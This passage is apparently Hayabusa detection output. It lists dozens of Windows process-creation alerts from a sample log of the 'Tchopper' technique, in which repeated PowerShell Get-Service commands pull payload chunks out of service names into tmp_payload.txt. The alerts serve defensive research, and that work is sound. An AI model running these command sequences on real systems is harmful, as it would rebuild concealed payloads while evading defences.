Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:48.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg138"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:49.478 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:49.493 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:50.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:52.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:53.856 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:53.872 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:55.310 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:56.748 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:56.764 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xec8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:58.217 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:59.670 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:59.686 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf44 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:01.122 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:01.137 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:02.574 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:04.025 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:05.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:06.935 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg151"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:08.391 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg152"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:09.863 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg153"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x218 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:11.334 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg154"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:38:12.782 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg155"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 
